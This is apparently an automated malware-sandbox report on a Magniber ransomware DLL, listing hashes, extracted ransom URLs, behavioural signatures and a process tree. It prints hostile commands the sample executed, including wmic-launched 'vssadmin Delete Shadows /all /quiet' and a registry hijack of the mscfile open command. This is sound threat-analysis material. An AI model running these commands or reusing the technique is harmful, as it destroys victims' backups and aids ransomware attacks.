Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
147s -
max time network
143s -
platform
windows7_x64 -
resource
win7-en-20210920 -
submitted
25/10/2021, 10:20
Static task
static1
Behavioral task
behavioral1
Sample
10b9b1d8f6bafd9bb57ccfb1da4a658f10207d566781fa5fb3c4394d283e860e.dll
Resource
win7-en-20210920
Behavioral task
behavioral2
Sample
10b9b1d8f6bafd9bb57ccfb1da4a658f10207d566781fa5fb3c4394d283e860e.dll
Resource
win10-en-20211014
General
-
Target
10b9b1d8f6bafd9bb57ccfb1da4a658f10207d566781fa5fb3c4394d283e860e.dll
-
Size
21KB
-
MD5
a60c5212d52fe1488d2f82989a2947d2
-
SHA1
0a744d6c76902d28eb6687d66c18b0a354f29b9d
-
SHA256
10b9b1d8f6bafd9bb57ccfb1da4a658f10207d566781fa5fb3c4394d283e860e
-
SHA512
afd14daa5bd9448e09f25d561e8be34e16f93a2825129d165e817a4a2a3ffc339efefd6f26e78c4853acfbce7f51c88b81601324b123d8c377d72da15dcf9327
Malware Config
Extracted
C:\Users\Admin\Desktop\readme.txt
magniber
http://a6b48ea8e0f4da80e8dihlxbl.l5nmxg2syswnc6s3724evnip5uktj7msy3pgowkbcidbei3nbysi7ead.onion/dihlxbl
http://a6b48ea8e0f4da80e8dihlxbl.uponmix.xyz/dihlxbl
http://a6b48ea8e0f4da80e8dihlxbl.flysex.space/dihlxbl
http://a6b48ea8e0f4da80e8dihlxbl.partscs.site/dihlxbl
http://a6b48ea8e0f4da80e8dihlxbl.codehes.uno/dihlxbl
Signatures
-
Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
-
Process spawned unexpected child process 8 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1564 1176 cmd.exe 43 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1228 1176 cmd.exe 43 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1596 1176 cmd.exe 43 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1880 1176 cmd.exe 43 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1968 1176 vssadmin.exe 43 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1460 1176 vssadmin.exe 43 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1664 1176 vssadmin.exe 43 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 892 1176 vssadmin.exe 43 -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies extensions of user files 4 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File renamed C:\Users\Admin\Pictures\ConnectUnprotect.png => C:\Users\Admin\Pictures\ConnectUnprotect.png.dihlxbl taskhost.exe File renamed C:\Users\Admin\Pictures\EnterEdit.tif => C:\Users\Admin\Pictures\EnterEdit.tif.dihlxbl taskhost.exe File renamed C:\Users\Admin\Pictures\JoinClear.png => C:\Users\Admin\Pictures\JoinClear.png.dihlxbl taskhost.exe File renamed C:\Users\Admin\Pictures\JoinInitialize.png => C:\Users\Admin\Pictures\JoinInitialize.png.dihlxbl taskhost.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 1880 set thread context of 1204 1880 rundll32.exe 13 PID 1880 set thread context of 1332 1880 rundll32.exe 12 PID 1880 set thread context of 1376 1880 rundll32.exe 11 -
Interacts with shadow copies 2 TTPs 4 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1664 vssadmin.exe 892 vssadmin.exe 1968 vssadmin.exe 1460 vssadmin.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "341921997" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000005f45a3407a6eee4cb6062dddd85478a60000000002000000000010660000000100002000000046604aca58700a963b55168992ec64186259e5dd7e8000e39feff27cb71fba25000000000e8000000002000020000000f71033adbf5663b973af6abb487c1f659d1fae015a89487a929b6ab74b946079200000000dd04ccba447fe6c57b0390cd8ba2408b2ed1950a5e26080dfba6e86a68632944000000057a3152926db1beb2befe453835b5c645fc6d32f17e0178f44893abcae622e63ab9e5388223a604fd0514005b542030610bbd27ea233fe1f55614fbf0c9fa547 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 6022548e89c9d701 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{B0845181-357C-11EC-A7A9-76EEF3F0AB23} = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000005f45a3407a6eee4cb6062dddd85478a600000000020000000000106600000001000020000000cf544e40e82c9237321f45cd51e546b3d1c337c2fed1bbc83918032214f8fd5d000000000e800000000200002000000085ded523e66dfde790487d5aad9ee4b9e1f5f31c66d1806fa92bfc801aa1fc90900000001ec513778043767743b0c75d4755aa2728730e757b8872e4919a45c969687facf94dc3703b82c21902bffa817089e93b711ba3b8f61ca99613f2ea5faca7458b74346075e4237291f68cc2690fc3e3750acff00da93077a0d975619b7410d5f04db4cb53bd3f371472c337b157edd44efae86186d3fe0a7691a0f83fdc2a0a01eee3a21a57aa50162cb5b8c92d6703dc400000005090d735e10fc47f2bf060b3c4d24faa86054f941dd633ba24bad7050abbc8ecccaa9a04620a38789725b51543a3c0e85d4631082878dd8a14cddaa04a1cc2cc iexplore.exe -
Modifies registry class 11 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" Dwm.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\mscfile\shell\open\command Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\mscfile\shell\open\command cmd.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\mscfile\shell\open\command taskhost.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\mscfile taskhost.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\mscfile\shell taskhost.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\mscfile\shell\open\command Dwm.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\mscfile\shell\open taskhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" taskhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" cmd.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 552 notepad.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1880 rundll32.exe 1880 rundll32.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 1880 rundll32.exe 1880 rundll32.exe 1880 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 1376 Explorer.EXE Token: SeShutdownPrivilege 1376 Explorer.EXE Token: SeIncreaseQuotaPrivilege 432 WMIC.exe Token: SeSecurityPrivilege 432 WMIC.exe Token: SeTakeOwnershipPrivilege 432 WMIC.exe Token: SeLoadDriverPrivilege 432 WMIC.exe Token: SeSystemProfilePrivilege 432 WMIC.exe Token: SeSystemtimePrivilege 432 WMIC.exe Token: SeProfSingleProcessPrivilege 432 WMIC.exe Token: SeIncBasePriorityPrivilege 432 WMIC.exe Token: SeCreatePagefilePrivilege 432 WMIC.exe Token: SeBackupPrivilege 432 WMIC.exe Token: SeRestorePrivilege 432 WMIC.exe Token: SeShutdownPrivilege 432 WMIC.exe Token: SeDebugPrivilege 432 WMIC.exe Token: SeSystemEnvironmentPrivilege 432 WMIC.exe Token: SeRemoteShutdownPrivilege 432 WMIC.exe Token: SeUndockPrivilege 432 WMIC.exe Token: SeManageVolumePrivilege 432 WMIC.exe Token: 33 432 WMIC.exe Token: 34 432 WMIC.exe Token: 35 432 WMIC.exe Token: SeIncreaseQuotaPrivilege 432 vssvc.exe Token: SeSecurityPrivilege 432 vssvc.exe Token: SeTakeOwnershipPrivilege 432 vssvc.exe Token: SeLoadDriverPrivilege 432 vssvc.exe Token: SeSystemProfilePrivilege 432 vssvc.exe Token: SeSystemtimePrivilege 432 vssvc.exe Token: SeProfSingleProcessPrivilege 432 vssvc.exe Token: SeIncBasePriorityPrivilege 432 vssvc.exe Token: SeCreatePagefilePrivilege 432 vssvc.exe Token: SeBackupPrivilege 432 vssvc.exe Token: SeRestorePrivilege 432 vssvc.exe Token: SeShutdownPrivilege 432 vssvc.exe Token: SeDebugPrivilege 432 vssvc.exe Token: SeSystemEnvironmentPrivilege 432 vssvc.exe Token: SeRemoteShutdownPrivilege 432 vssvc.exe Token: SeUndockPrivilege 432 vssvc.exe Token: SeManageVolumePrivilege 432 vssvc.exe Token: 33 432 vssvc.exe Token: 34 432 vssvc.exe Token: 35 432 vssvc.exe Token: SeShutdownPrivilege 1376 Explorer.EXE Token: SeShutdownPrivilege 1376 Explorer.EXE Token: SeIncreaseQuotaPrivilege 1356 WMIC.exe Token: SeSecurityPrivilege 1356 WMIC.exe Token: SeTakeOwnershipPrivilege 1356 WMIC.exe Token: SeLoadDriverPrivilege 1356 WMIC.exe Token: SeSystemProfilePrivilege 1356 WMIC.exe Token: SeSystemtimePrivilege 1356 WMIC.exe Token: SeProfSingleProcessPrivilege 1356 WMIC.exe Token: SeIncBasePriorityPrivilege 1356 WMIC.exe Token: SeCreatePagefilePrivilege 1356 WMIC.exe Token: SeBackupPrivilege 1356 WMIC.exe Token: SeRestorePrivilege 1356 WMIC.exe Token: SeShutdownPrivilege 1356 WMIC.exe Token: SeDebugPrivilege 1356 WMIC.exe Token: SeSystemEnvironmentPrivilege 1356 WMIC.exe Token: SeRemoteShutdownPrivilege 1356 WMIC.exe Token: SeUndockPrivilege 1356 WMIC.exe Token: SeManageVolumePrivilege 1356 WMIC.exe Token: 33 1356 WMIC.exe Token: 34 1356 WMIC.exe Token: 35 1356 WMIC.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 1252 iexplore.exe 1376 Explorer.EXE 1376 Explorer.EXE 552 notepad.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 1376 Explorer.EXE 1376 Explorer.EXE 1376 Explorer.EXE -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 1252 iexplore.exe 1252 iexplore.exe 596 IEXPLORE.EXE 596 IEXPLORE.EXE 596 IEXPLORE.EXE 596 IEXPLORE.EXE -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 1376 Explorer.EXE -
Suspicious use of WriteProcessMemory 61 IoCs
description pid Process procid_target PID 1204 wrote to memory of 552 1204 taskhost.exe 28 PID 1204 wrote to memory of 552 1204 taskhost.exe 28 PID 1204 wrote to memory of 552 1204 taskhost.exe 28 PID 1204 wrote to memory of 1400 1204 taskhost.exe 29 PID 1204 wrote to memory of 1400 1204 taskhost.exe 29 PID 1204 wrote to memory of 1400 1204 taskhost.exe 29 PID 1204 wrote to memory of 1820 1204 taskhost.exe 30 PID 1204 wrote to memory of 1820 1204 taskhost.exe 30 PID 1204 wrote to memory of 1820 1204 taskhost.exe 30 PID 1820 wrote to memory of 432 1820 cmd.exe 33 PID 1820 wrote to memory of 432 1820 cmd.exe 33 PID 1820 wrote to memory of 432 1820 cmd.exe 33 PID 1400 wrote to memory of 1252 1400 Process not Found 37 PID 1400 wrote to memory of 1252 1400 Process not Found 37 PID 1400 wrote to memory of 1252 1400 Process not Found 37 PID 1332 wrote to memory of 1464 1332 Dwm.exe 34 PID 1332 wrote to memory of 1464 1332 Dwm.exe 34 PID 1332 wrote to memory of 1464 1332 Dwm.exe 34 PID 1376 wrote to memory of 1900 1376 Explorer.EXE 38 PID 1376 wrote to memory of 1900 1376 Explorer.EXE 38 PID 1376 wrote to memory of 1900 1376 Explorer.EXE 38 PID 1464 wrote to memory of 1356 1464 cmd.exe 39 PID 1464 wrote to memory of 1356 1464 cmd.exe 39 PID 1464 wrote to memory of 1356 1464 cmd.exe 39 PID 1880 wrote to memory of 1460 1880 cmd.exe 67 PID 1880 wrote to memory of 1460 1880 cmd.exe 67 PID 1880 wrote to memory of 1460 1880 cmd.exe 67 PID 1460 wrote to memory of 984 1460 vssadmin.exe 44 PID 1460 wrote to memory of 984 1460 vssadmin.exe 44 PID 1460 wrote to memory of 984 1460 vssadmin.exe 44 PID 1900 wrote to memory of 1540 1900 cmd.exe 45 PID 1900 wrote to memory of 1540 1900 cmd.exe 45 PID 1900 wrote to memory of 1540 1900 cmd.exe 45 PID 1564 wrote to memory of 1592 1564 Process not Found 48 PID 1564 wrote to memory of 1592 1564 Process not Found 48 PID 1564 wrote to memory of 1592 1564 Process not Found 48 PID 1228 wrote to memory of 1584 1228 cmd.exe 56 PID 1228 wrote to memory of 1584 1228 cmd.exe 56 PID 1228 wrote to memory of 1584 1228 cmd.exe 56 PID 1880 wrote to memory of 1052 1880 cmd.exe 57 PID 1880 wrote to memory of 1052 1880 cmd.exe 57 PID 1880 wrote to memory of 1052 1880 cmd.exe 57 PID 1596 wrote to memory of 672 1596 Process not Found 68 PID 1596 wrote to memory of 672 1596 Process not Found 68 PID 1596 wrote to memory of 672 1596 Process not Found 68 PID 1252 wrote to memory of 596 1252 iexplore.exe 59 PID 1252 wrote to memory of 596 1252 iexplore.exe 59 PID 1252 wrote to memory of 596 1252 iexplore.exe 59 PID 1252 wrote to memory of 596 1252 iexplore.exe 59 PID 1584 wrote to memory of 1640 1584 CompMgmtLauncher.exe 63 PID 1584 wrote to memory of 1640 1584 CompMgmtLauncher.exe 63 PID 1584 wrote to memory of 1640 1584 CompMgmtLauncher.exe 63 PID 672 wrote to memory of 616 672 conhost.exe 60 PID 672 wrote to memory of 616 672 conhost.exe 60 PID 672 wrote to memory of 616 672 conhost.exe 60 PID 1052 wrote to memory of 1952 1052 CompMgmtLauncher.exe 64 PID 1052 wrote to memory of 1952 1052 CompMgmtLauncher.exe 64 PID 1052 wrote to memory of 1952 1052 CompMgmtLauncher.exe 64 PID 1592 wrote to memory of 812 1592 CompMgmtLauncher.exe 70 PID 1592 wrote to memory of 812 1592 CompMgmtLauncher.exe 70 PID 1592 wrote to memory of 812 1592 CompMgmtLauncher.exe 70
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:1376 -
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\10b9b1d8f6bafd9bb57ccfb1da4a658f10207d566781fa5fb3c4394d283e860e.dll,#12⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1880 -
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""3⤵PID:1460
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"4⤵PID:984
-
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:1900 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵PID:1540
-
-
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1332 -
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:1464 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1356
-
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"1⤵
- Modifies extensions of user files
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1204 -
C:\Windows\system32\notepad.exenotepad.exe C:\Users\Public\readme.txt2⤵
- Opens file in notepad (likely ransom note)
- Suspicious use of FindShellTrayWindow
PID:552
-
-
C:\Windows\system32\cmd.execmd /c "start http://a6b48ea8e0f4da80e8dihlxbl.uponmix.xyz/dihlxbl^&1^&45776257^&89^&329^&12"2⤵PID:1400
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://a6b48ea8e0f4da80e8dihlxbl.uponmix.xyz/dihlxbl&1&45776257&89&329&123⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1252 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1252 CREDAT:275457 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:596
-
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:1820 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:432
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
PID:1564 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1592 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:812
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1228 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1584 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:1640
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
PID:1596 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵PID:672
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:616
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1880 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1052 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:1952
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1968
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
- Suspicious use of WriteProcessMemory
PID:1460
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1001739293-1902405756998992751-893970671-139624582116301377211035259241210773137"1⤵
- Suspicious use of WriteProcessMemory
PID:672
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:432
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1664
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:892